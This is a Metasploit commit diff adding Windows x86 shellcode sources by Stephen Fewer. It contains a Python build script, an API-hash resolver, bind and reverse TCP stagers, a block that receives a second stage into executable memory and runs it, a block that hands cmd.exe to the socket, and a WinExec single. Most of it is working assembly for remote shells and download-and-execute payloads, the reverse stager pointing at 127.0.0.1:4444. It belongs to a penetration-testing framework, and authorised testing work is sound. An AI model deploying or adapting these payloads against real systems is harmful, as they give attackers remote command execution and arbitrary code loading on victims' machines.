Overhaul of the metasploit payloads from Stephen Fewer - smaller/cleaner/new hashing/support for WinNT 4.0 -> Win7 with size reductions for the stagers and minimal size increases for the singles
git-svn-id: file:///home/svn/framework3/trunk@6922 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
91faadd782
commit
49b7dcb30c
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,98 @@
|
|||
#=============================================================================#
|
||||
# A simple python build script to build the singles/stages/stagers and
|
||||
# some usefull information such as offsets and a hex dump. The binary output
|
||||
# will be placed in the bin directory. A hex string and usefull comments will
|
||||
# be printed to screen.
|
||||
#
|
||||
# Example:
|
||||
# >python build.py stager_reverse_tcp_nx
|
||||
#
|
||||
# Example, to build everything:
|
||||
# >python build.py all > build_output.txt
|
||||
#
|
||||
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
#=============================================================================#
|
||||
import os, sys, time
|
||||
from subprocess import Popen
|
||||
from struct import pack
|
||||
#=============================================================================#
|
||||
def clean( dir="./bin/" ):
|
||||
for root, dirs, files in os.walk( dir ):
|
||||
for name in files:
|
||||
os.remove( os.path.join( root, name ) )
|
||||
#=============================================================================#
|
||||
def locate( src_file, dir="./src/" ):
|
||||
for root, dirs, files in os.walk( dir ):
|
||||
for name in files:
|
||||
if src_file == name:
|
||||
return root
|
||||
return None
|
||||
#=============================================================================#
|
||||
def build( name ):
|
||||
location = locate( "%s.asm" % name )
|
||||
if location:
|
||||
input = os.path.normpath( os.path.join( location, name ) )
|
||||
output = os.path.normpath( os.path.join( "./bin/", name ) )
|
||||
p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
|
||||
p.wait()
|
||||
xmit( name )
|
||||
else:
|
||||
print "[-] Unable to locate '%s.asm' in the src directory" % name
|
||||
#=============================================================================#
|
||||
def xmit_dump_ruby( data, length=16 ):
|
||||
dump = ""
|
||||
for i in xrange( 0, len( data ), length ):
|
||||
bytes = data[ i : i+length ]
|
||||
hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
|
||||
if i+length <= len(data):
|
||||
hex += " +"
|
||||
dump += "%s\n" % ( hex )
|
||||
print dump
|
||||
#=============================================================================#
|
||||
def xmit_offset( data, name, value ):
|
||||
offset = data.find( value );
|
||||
if offset != -1:
|
||||
print "# %s Offset: %d" % ( name, offset )
|
||||
#=============================================================================#
|
||||
def xmit( name, dump_ruby=True ):
|
||||
bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
|
||||
f = open( bin, 'rb')
|
||||
data = f.read()
|
||||
print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
|
||||
xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
|
||||
xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
|
||||
xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
|
||||
if dump_ruby:
|
||||
xmit_dump_ruby( data )
|
||||
#=============================================================================#
|
||||
def main( argv=None ):
|
||||
if not argv:
|
||||
argv = sys.argv
|
||||
try:
|
||||
if len( argv ) == 1:
|
||||
print "Usage: build.py [clean|all|<name>]"
|
||||
else:
|
||||
print "# Built on %s\n" % ( time.asctime( time.localtime() ) )
|
||||
if argv[1] == "clean":
|
||||
clean()
|
||||
elif argv[1] == "all":
|
||||
for root, dirs, files in os.walk( "./src/single/" ):
|
||||
for name in files:
|
||||
build( name[:-4] )
|
||||
for root, dirs, files in os.walk( "./src/stage/" ):
|
||||
for name in files:
|
||||
build( name[:-4] )
|
||||
for root, dirs, files in os.walk( "./src/stager/" ):
|
||||
for name in files:
|
||||
build( name[:-4] )
|
||||
else:
|
||||
build( argv[1] )
|
||||
except Exception, e:
|
||||
print "[-] ", e
|
||||
#=============================================================================#
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
#=============================================================================#
|
|
@ -0,0 +1,97 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 137 bytes
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
|
||||
; Input: The hash of the API to call and all its parameters must be pushed onto stack.
|
||||
; Output: The return value from the API call will be in EAX.
|
||||
; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
|
||||
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
|
||||
; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
|
||||
; Note: This function is unable to call forwarded exports.
|
||||
|
||||
api_call:
|
||||
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
|
||||
mov ebp, esp ; Create a new stack frame
|
||||
xor edx, edx ; Zero EDX
|
||||
mov edx, [fs:edx+48] ; Get a pointer to the PEB
|
||||
mov edx, [edx+12] ; Get PEB->Ldr
|
||||
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
|
||||
next_mod: ;
|
||||
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
|
||||
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
|
||||
xor edi, edi ; Clear EDI which will store the hash of the module name
|
||||
loop_modname: ;
|
||||
xor eax, eax ; Clear EAX
|
||||
lodsb ; Read in the next byte of the name
|
||||
cmp al, 'a' ; Some versions of Windows use lower case module names
|
||||
jl not_lowercase ;
|
||||
sub al, 0x20 ; If so normalise to uppercase
|
||||
not_lowercase: ;
|
||||
ror edi, 13 ; Rotate right our hash value
|
||||
add edi, eax ; Add the next byte of the name
|
||||
loop loop_modname ; Loop untill we have read enough
|
||||
; We now have the module hash computed
|
||||
push edx ; Save the current position in the module list for later
|
||||
push edi ; Save the current module hash for later
|
||||
; Proceed to itterate the export address table,
|
||||
mov edx, [edx+16] ; Get this modules base address
|
||||
mov eax, [edx+60] ; Get PE header
|
||||
add eax, edx ; Add the modules base address
|
||||
mov eax, [eax+120] ; Get export tables RVA
|
||||
test eax, eax ; Test if no export address table is present
|
||||
jz get_next_mod1 ; If no EAT present, process the next module
|
||||
add eax, edx ; Add the modules base address
|
||||
push eax ; Save the current modules EAT
|
||||
mov ecx, [eax+24] ; Get the number of function names
|
||||
mov ebx, [eax+32] ; Get the rva of the function names
|
||||
add ebx, edx ; Add the modules base address
|
||||
; Computing the module hash + function hash
|
||||
get_next_func: ;
|
||||
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
|
||||
dec ecx ; Decrement the function name counter
|
||||
mov esi, [ebx+ecx*4] ; Get rva of next module name
|
||||
add esi, edx ; Add the modules base address
|
||||
xor edi, edi ; Clear EDI which will store the hash of the function name
|
||||
; And compare it to the one we want
|
||||
loop_funcname: ;
|
||||
xor eax, eax ; Clear EAX
|
||||
lodsb ; Read in the next byte of the ASCII function name
|
||||
ror edi, 13 ; Rotate right our hash value
|
||||
add edi, eax ; Add the next byte of the name
|
||||
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
|
||||
jne loop_funcname ; If we have not reached the null terminator, continue
|
||||
add edi, [ebp-8] ; Add the current module hash to the function hash
|
||||
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
|
||||
jnz get_next_func ; Go compute the next function hash if we have not found it
|
||||
; If found, fix up stack, call the function and then value else compute the next one...
|
||||
pop eax ; Restore the current modules EAT
|
||||
mov ebx, [eax+36] ; Get the ordinal table rva
|
||||
add ebx, edx ; Add the modules base address
|
||||
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
|
||||
mov ebx, [eax+28] ; Get the function addresses table rva
|
||||
add ebx, edx ; Add the modules base address
|
||||
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
|
||||
add eax, edx ; Add the modules base address to get the functions actual VA
|
||||
; We now fix up the stack and perform the call to the desired function...
|
||||
finish:
|
||||
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
|
||||
pop ebx ; Clear off the current modules hash
|
||||
pop ebx ; Clear off the current position in the module list
|
||||
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
|
||||
pop ecx ; Pop off the origional return address our caller will have pushed
|
||||
pop edx ; Pop off the hash value our caller will have pushed
|
||||
push ecx ; Push back the correct return value
|
||||
jmp eax ; Jump into the required function
|
||||
; We now automagically return to the correct caller...
|
||||
get_next_mod: ;
|
||||
pop eax ; Pop off the current (now the previous) modules EAT
|
||||
get_next_mod1: ;
|
||||
pop edi ; Pop off the current (now the previous) modules hash
|
||||
pop edx ; Restore our position in the module list
|
||||
mov edx, [edx] ; Get the next module
|
||||
jmp short next_mod ; Process this module
|
|
@ -0,0 +1,63 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: EDI will be the newly connected clients socket
|
||||
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
|
||||
|
||||
bind_tcp:
|
||||
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
|
||||
push 0x5F327377 ; ...
|
||||
push esp ; Push a pointer to the "ws2_32" string on the stack.
|
||||
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||
call ebp ; LoadLibraryA( "ws2_32" )
|
||||
|
||||
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
|
||||
sub esp, eax ; alloc some space for the WSAData structure
|
||||
push esp ; push a pointer to this stuct
|
||||
push eax ; push the wVersionRequested parameter
|
||||
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
|
||||
call ebp ; WSAStartup( 0x0190, &WSAData );
|
||||
|
||||
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
|
||||
push eax ; push null for reserved parameter
|
||||
push eax ; we do not specify a WSAPROTOCOL_INFO structure
|
||||
push eax ; we do not specify a protocol
|
||||
inc eax ;
|
||||
push eax ; push SOCK_STREAM
|
||||
inc eax ;
|
||||
push eax ; push AF_INET
|
||||
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
|
||||
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
||||
mov edi, eax ; save the socket for later
|
||||
|
||||
xor ebx, ebx ; Clear EBX
|
||||
push ebx ; bind to 0.0.0.0
|
||||
push 0x5C110002 ; family AF_INET and port 4444
|
||||
mov esi, esp ; save a pointer to sockaddr_in struct
|
||||
push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
|
||||
push esi ; pointer to the sockaddr_in struct
|
||||
push edi ; socket
|
||||
push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" )
|
||||
call ebp ; bind( s, &sockaddr_in, 16 );
|
||||
|
||||
push ebx ; backlog
|
||||
push edi ; socket
|
||||
push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" )
|
||||
call ebp ; listen( s, 0 );
|
||||
|
||||
push ebx ; we set length for the sockaddr struct to zero
|
||||
push ebx ; we dont set the optional sockaddr param
|
||||
push edi ; listening socket
|
||||
push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
|
||||
call ebp ; accept( s, 0, 0 );
|
||||
|
||||
push edi ; push the listening socket to close
|
||||
mov edi, eax ; swap the new connected socket over the listening socket
|
||||
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
|
||||
call ebp ; closesocket( s );
|
||||
|
|
@ -0,0 +1,52 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
; Size: 31 bytes
|
||||
;-----------------------------------------------------------------------------;
|
||||
; kernel32.dll!SetUnhandledExceptionFilter (0xEA320EFE) - This exit function
|
||||
; will let the UnhandledExceptionFilter function perform its default handling
|
||||
; routine.
|
||||
;
|
||||
; kernel32.dll!ExitProcess (0x56A2B5F0) - This exit function will force the
|
||||
; process to terminate.
|
||||
;
|
||||
; kernel32.dll!ExitThread (0x0A2A1DE0) - This exit function will force the
|
||||
; current thread to terminate. On Windows 2008, Vista and 7 this function is
|
||||
; a forwarded export to ntdll.dll!RtlExitUserThread and as such cannot be
|
||||
; called by the api_call function.
|
||||
;
|
||||
; ntdll.dll!RtlExitUserThread (0x6F721347) - This exit function will force
|
||||
; the current thread to terminate. This function is not available on Windows
|
||||
; NT or 2000.
|
||||
;-----------------------------------------------------------------------------;
|
||||
; Windows 7 6.1
|
||||
; Windows Server 2008 R2 6.1 If the EXITFUNK is ExitThread we must call
|
||||
; Windows Server 2008 6.0 RtlExitUserThread instead.
|
||||
; Windows Vista 6.0 _______________________________________________
|
||||
; Windows Server 2003 R2 5.2
|
||||
; Windows Server 2003 5.2
|
||||
; Windows XP 5.1
|
||||
; Windows 2000 5.0
|
||||
; Windows NT4 4.0
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: None.
|
||||
; Clobbers: EAX, EBX, (ESP will also be modified)
|
||||
; Note: Execution is not expected to (successfully) continue past this block
|
||||
|
||||
exitfunk:
|
||||
mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
|
||||
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
|
||||
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
|
||||
cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
|
||||
jl short goodbye ; Then just call the exit function...
|
||||
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
|
||||
jne short goodbye ;
|
||||
mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
|
||||
goodbye: ; We now perform the actual call to the exit function
|
||||
push byte 0 ; push the exit function parameter
|
||||
push ebx ; push the hash of the exit function
|
||||
call ebp ; call EXITFUNK( 0 );
|
|
@ -0,0 +1,44 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Compatible: block_bind_tcp, block_reverse_tcp
|
||||
|
||||
; Input: EBP must be the address of 'api_call'. EDI must be the socket. ESI is a pointer on stack.
|
||||
; Output: None.
|
||||
; Clobbers: EAX, EBX, ESI, (ESP will also be modified)
|
||||
|
||||
recv:
|
||||
; Receive the size of the incoming second stage...
|
||||
push byte 0 ; flags
|
||||
push byte 4 ; length = sizeof( DWORD );
|
||||
push esi ; the 4 byte buffer on the stack to hold the second stage length
|
||||
push edi ; the saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, &dwLength, 4, 0 );
|
||||
; Alloc a RWX buffer for the second stage
|
||||
mov esi, [esi] ; dereference the pointer to the second stage length
|
||||
push byte 0x40 ; PAGE_EXECUTE_READWRITE
|
||||
push 0x1000 ; MEM_COMMIT
|
||||
push esi ; push the newly recieved second stage length.
|
||||
push byte 0 ; NULL as we dont care where the allocation is.
|
||||
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
|
||||
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
; Receive the second stage and execute it...
|
||||
mov ebx, eax ; ebx = our new memory address for the new stage
|
||||
push ebx ; push the address of the new stage so we can return into it
|
||||
read_more: ;
|
||||
push byte 0 ; flags
|
||||
push esi ; length
|
||||
push ebx ; the current address into our second stages RWX buffer
|
||||
push edi ; the saved socket
|
||||
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
|
||||
call ebp ; recv( s, buffer, length, 0 );
|
||||
add ebx, eax ; buffer += bytes_received
|
||||
sub esi, eax ; length -= bytes_received
|
||||
test esi, esi ; test length
|
||||
jnz read_more ; continue if we have more to read
|
||||
ret ; return into the second stage
|
|
@ -0,0 +1,45 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'.
|
||||
; Output: EDI will be the socket for the connection to the server
|
||||
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
|
||||
|
||||
reverse_tcp:
|
||||
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
|
||||
push 0x5F327377 ; ...
|
||||
push esp ; Push a pointer to the "ws2_32" string on the stack.
|
||||
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||
call ebp ; LoadLibraryA( "ws2_32" )
|
||||
|
||||
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
|
||||
sub esp, eax ; alloc some space for the WSAData structure
|
||||
push esp ; push a pointer to this stuct
|
||||
push eax ; push the wVersionRequested parameter
|
||||
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
|
||||
call ebp ; WSAStartup( 0x0190, &WSAData );
|
||||
|
||||
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
|
||||
push eax ; push null for reserved parameter
|
||||
push eax ; we do not specify a WSAPROTOCOL_INFO structure
|
||||
push eax ; we do not specify a protocol
|
||||
inc eax ;
|
||||
push eax ; push SOCK_STREAM
|
||||
inc eax ;
|
||||
push eax ; push AF_INET
|
||||
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
|
||||
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
|
||||
mov edi, eax ; save the socket for later
|
||||
|
||||
push 0x0100007F ; host 127.0.0.1
|
||||
push 0x5C110002 ; family AF_INET and port 4444
|
||||
mov esi, esp ; save pointer to sockaddr struct
|
||||
push byte 16 ; length of the sockaddr struct
|
||||
push esi ; pointer to the sockaddr struct
|
||||
push edi ; the socket
|
||||
push 0x6174A599 ; hash( "ws2_32.dll", "connect" )
|
||||
call ebp ; connect( s, &sockaddr, 16 );
|
|
@ -0,0 +1,49 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (24 July 2009)
|
||||
;-----------------------------------------------------------------------------;
|
||||
[BITS 32]
|
||||
|
||||
; Input: EBP must be the address of 'api_call'. EDI must be a socket.
|
||||
; Output: None.
|
||||
; Clobbers: EAX, EBX, ECX, ESI, ESP will also be modified
|
||||
|
||||
shell:
|
||||
push 0x00646D63 ; push our command line: 'cmd',0
|
||||
mov ebx, esp ; save a pointer to the command line
|
||||
push edi ; our socket becomes the shells hStdError
|
||||
push edi ; our socket becomes the shells hStdOutput
|
||||
push edi ; our socket becomes the shells hStdInput
|
||||
xor esi, esi ; Clear ESI for all the NULL's we need to push
|
||||
push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
|
||||
pop ecx ; Set ECX for the loop
|
||||
push_loop: ;
|
||||
push esi ; push a null dword
|
||||
loop push_loop ; keep looping untill we have pushed enough nulls
|
||||
mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
|
||||
lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure
|
||||
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
|
||||
; perform the call to CreateProcessA
|
||||
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
|
||||
push eax ; Push the pointer to the STARTUPINFO Structure
|
||||
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
|
||||
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
|
||||
push esi ; We dont specify any dwCreationFlags
|
||||
inc esi ; Increment ESI to be one
|
||||
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
|
||||
dec esi ; Decrement ESI back down to zero
|
||||
push esi ; Set lpThreadAttributes to NULL
|
||||
push esi ; Set lpProcessAttributes to NULL
|
||||
push ebx ; Set the lpCommandLine to point to "cmd",0
|
||||
push esi ; Set lpApplicationName to NULL as we are using the command line param instead
|
||||
push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
|
||||
call ebp ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
|
||||
; perform the call to WaitForSingleObject
|
||||
mov eax, esp ; save pointer to the PROCESS_INFORMATION Structure
|
||||
dec esi ; Decrement ESI down to -1 (INFINITE)
|
||||
push esi ; push INFINITE inorder to wait forever
|
||||
inc esi ; Increment ESI back to zero
|
||||
push dword [eax] ; push the handle from our PROCESS_INFORMATION.hProcess
|
||||
push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
|
||||
call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );
|
|
@ -0,0 +1,146 @@
|
|||
#=============================================================================#
|
||||
# This script can detect hash collisions between exported API functions in
|
||||
# multiple modules by either scanning a directory tree or just a single module.
|
||||
# This script can also just output the correct hash value for any single API
|
||||
# function for use with the 'api_call' function in 'block_api.asm'.
|
||||
#
|
||||
# Example: Detect fatal collisions against all modules in the C drive:
|
||||
# >hash.py /dir c:\
|
||||
#
|
||||
# Example: List the hashes for all exports from kernel32.dll (As found in 'c:\windows\system32\')
|
||||
# >hash.py /mod c:\windows\system32\ kernel32.dll
|
||||
#
|
||||
# Example: Simply print the correct hash value for the function kernel32.dll!WinExec
|
||||
# >hash.py kernel32.dll WinExec
|
||||
#
|
||||
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
#=============================================================================#
|
||||
from sys import path
|
||||
import os, time, sys
|
||||
|
||||
# Modify this path to pefile to suit your machine...
|
||||
pefile_path = "D:\\Development\\Frameworks\\pefile\\"
|
||||
|
||||
path.append( pefile_path )
|
||||
import pefile
|
||||
#=============================================================================#
|
||||
collisions = [ ( 0x006B8029, "ws2_32.dll!WSAStartup" ),
|
||||
( 0xE0DF0FEA, "ws2_32.dll!WSASocketA" ),
|
||||
( 0x6737DBC2, "ws2_32.dll!bind" ),
|
||||
( 0xFF38E9B7, "ws2_32.dll!listen" ),
|
||||
( 0xE13BEC74, "ws2_32.dll!accept" ),
|
||||
( 0x614D6E75, "ws2_32.dll!closesocket" ),
|
||||
( 0x6174A599, "ws2_32.dll!connect" ),
|
||||
( 0x5FC8D902, "ws2_32.dll!recv" ),
|
||||
( 0x5F38EBC2, "ws2_32.dll!send" ),
|
||||
|
||||
( 0x5BAE572D, "kernel32.dll!WriteFile" ),
|
||||
( 0x4FDAF6DA, "kernel32.dll!CreateFileA" ),
|
||||
( 0x13DD2ED7, "kernel32.dll!DeleteFileA" ),
|
||||
( 0xE449F330, "kernel32.dll!GetTempPathA" ),
|
||||
( 0x528796C6, "kernel32.dll!CloseHandle" ),
|
||||
( 0x863FCC79, "kernel32.dll!CreateProcessA" ),
|
||||
( 0xE553A458, "kernel32.dll!VirtualAlloc" ),
|
||||
( 0x300F2F0B, "kernel32.dll!VirtualFree" ),
|
||||
( 0x0726774C, "kernel32.dll!LoadLibraryA" ),
|
||||
( 0x7802F749, "kernel32.dll!GetProcAddress" ),
|
||||
( 0x601D8708, "kernel32.dll!WaitForSingleObject" ),
|
||||
( 0x876F8B31, "kernel32.dll!WinExec" ),
|
||||
( 0x9DBD95A6, "kernel32.dll!GetVersion" ),
|
||||
( 0xEA320EFE, "kernel32.dll!SetUnhandledExceptionFilter" ),
|
||||
( 0x56A2B5F0, "kernel32.dll!ExitProcess" ),
|
||||
( 0x0A2A1DE0, "kernel32.dll!ExitThread" ),
|
||||
|
||||
( 0x6F721347, "ntdll.dll!RtlExitUserThread" ),
|
||||
|
||||
( 0x23E38427, "advapi32.dll!RevertToSelf" )
|
||||
]
|
||||
|
||||
collisions_detected = {}
|
||||
modules_scanned = 0
|
||||
functions_scanned = 0
|
||||
#=============================================================================#
|
||||
def ror( dword, bits ):
|
||||
return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
|
||||
#=============================================================================#
|
||||
def unicode( string, uppercase=True ):
|
||||
result = "";
|
||||
if uppercase:
|
||||
string = string.upper()
|
||||
for c in string:
|
||||
result += c + "\x00"
|
||||
return result
|
||||
#=============================================================================#
|
||||
def hash( module, function, bits=13, print_hash=True ):
|
||||
module_hash = 0
|
||||
function_hash = 0
|
||||
for c in unicode( module + "\x00" ):
|
||||
module_hash = ror( module_hash, bits )
|
||||
module_hash += ord( c )
|
||||
for c in str( function + "\x00" ):
|
||||
function_hash = ror( function_hash, bits )
|
||||
function_hash += ord( c )
|
||||
h = module_hash + function_hash & 0xFFFFFFFF
|
||||
if print_hash:
|
||||
print "[+] 0x%08X = %s!%s" % ( h, module.lower(), function )
|
||||
return h
|
||||
#=============================================================================#
|
||||
def scan( dll_path, dll_name, print_hashes=False, print_collisions=True ):
|
||||
global modules_scanned
|
||||
global functions_scanned
|
||||
try:
|
||||
dll_name = dll_name.lower()
|
||||
modules_scanned += 1
|
||||
pe = pefile.PE( os.path.join( dll_path, dll_name ) )
|
||||
for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:
|
||||
if export.name is None:
|
||||
continue
|
||||
h = hash( dll_name, export.name, print_hash=print_hashes )
|
||||
for ( col_hash, col_name ) in collisions:
|
||||
if col_hash == h and col_name != "%s!%s" % (dll_name, export.name):
|
||||
if h not in collisions_detected.keys():
|
||||
collisions_detected[h] = []
|
||||
collisions_detected[h].append( (dll_path, dll_name, export.name) )
|
||||
break
|
||||
functions_scanned += 1
|
||||
except:
|
||||
pass
|
||||
#=============================================================================#
|
||||
def scan_directory( dir ):
|
||||
for dot, dirs, files in os.walk( dir ):
|
||||
for file_name in files:
|
||||
if file_name[-4:] == ".dll":# or file_name[-4:] == ".exe":
|
||||
scan( dot, file_name )
|
||||
print "\n[+] Found %d Collisions.\n" % ( len(collisions_detected) )
|
||||
for h in collisions_detected.keys():
|
||||
for (col_hash, col_name ) in collisions:
|
||||
if h == col_hash:
|
||||
detected_name = col_name
|
||||
break
|
||||
print "[!] Collision detected for 0x%08X (%s):" % ( h, detected_name )
|
||||
for (collided_dll_path, collided_dll_name, collided_export_name) in collisions_detected[h]:
|
||||
print "\t%s!%s (%s)" % ( collided_dll_name, collided_export_name, collided_dll_path )
|
||||
print "\n[+] Scanned %d exported functions via %d modules.\n" % ( functions_scanned, modules_scanned )
|
||||
#=============================================================================#
|
||||
def main( argv=None ):
|
||||
if not argv:
|
||||
argv = sys.argv
|
||||
try:
|
||||
if len( argv ) == 1:
|
||||
print "Usage: hash.py [/dir <path>] | [/mod <path> <module.dll>] | [<module.dll> <function>]"
|
||||
else:
|
||||
print "[+] Ran on %s\n" % ( time.asctime( time.localtime() ) )
|
||||
if argv[1] == "/dir":
|
||||
print "[+] Scanning directory '%s' for collisions..." % argv[2]
|
||||
scan_directory( argv[2] )
|
||||
elif argv[1] == "/mod":
|
||||
print "[+] Scanning module '%s' in directory '%s'..." % ( argv[3], argv[2] )
|
||||
scan( argv[2], argv[3], print_hashes=True )
|
||||
else:
|
||||
hash( argv[1], argv[2] )
|
||||
except Exception, e:
|
||||
print "[-] ", e
|
||||
#=============================================================================#
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
#=============================================================================#
|
|
@ -0,0 +1,26 @@
|
|||
;-----------------------------------------------------------------------------;
|
||||
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
|
||||
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
|
||||
; Version: 1.0 (28 July 2009)
|
||||
; Size: 191 bytes + strlen(command) + 1
|
||||
; Build: >build.py single_exec
|
||||
;-----------------------------------------------------------------------------;
|
||||
|
||||
[BITS 32]
|
||||
[ORG 0]
|
||||
|
||||
cld ; Clear the direction flag.
|
||||
call start ; Call start, this pushes the address of 'api_call' onto the stack.
|
||||
delta: ;
|
||||
%include "./src/block/block_api.asm" ;
|
||||
start: ;
|
||||
pop ebp ; Pop off the address of 'api_call' for calling later.
|
||||
push byte +1 ;
|
||||
lea eax, [ebp+command-delta]
|
||||
push eax ;
|
||||
push 0x876F8B31 ; hash( "kernel32.dll", "WinExec" )
|
||||
call ebp ; WinExec( &command, 1 );
|
||||
; Finish up with the EXITFUNK.
|
||||
%include "./src/block/block_exitfunk.asm"
|
||||
command:
|
||||
;db "calc.exe", 0
|
|
@ -0,0 +1,20 @@
|
|||
